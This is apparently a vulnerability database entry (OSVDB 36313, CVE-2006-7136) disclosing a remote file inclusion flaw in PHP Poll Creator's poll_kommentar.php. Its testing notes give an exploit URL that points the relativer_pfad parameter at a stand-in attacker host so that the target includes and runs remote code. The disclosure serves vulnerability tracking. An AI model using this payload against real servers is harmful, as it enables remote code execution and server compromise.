PHP Poll Creator (phpPC) poll_kommentar.php relativer_pfad Variable Remote File Inclusion

2006-11-21T00:00:00
ID OSVDB:36313
Type osvdb
Reporter iss4m(iss4m.1@gmail.com)
Modified 2006-11-21T00:00:00

Description

Manual Testing Notes

http://[target]/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt?

References:

Secunia Advisory ID:15510 Related OSVDB ID: 36314 Related OSVDB ID: 36312 ISS X-Force ID: 29393 Generic Exploit URL: http://www.milw0rm.com/exploits/2827 CVE-2006-7136 Bugtraq ID: 21245